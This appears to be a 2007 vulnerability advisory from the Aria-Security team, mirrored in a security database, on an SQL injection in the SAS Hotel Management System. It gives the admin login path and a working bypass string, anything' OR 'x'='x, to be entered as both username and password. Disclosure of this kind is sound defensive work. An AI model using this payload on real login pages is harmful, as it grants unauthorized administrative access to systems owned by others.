Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17739
HistoryAug 10, 2007 - 12:00 a.m.

[Aria-Security.net] SAS Hotel Management System SQL Injection

2007-08-1000:00:00
vulners.com
29

A R I A - S E CU R I T Y


SAS Hotel Management System SQL Injection
http://www.sellatsite.com/sellatsite/hotel.asp

Explanation:

http://path/admin/admin.asp

Username: anything' OR 'x'='x
password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.Aria-Security.net/ [PERSONAL BLOG]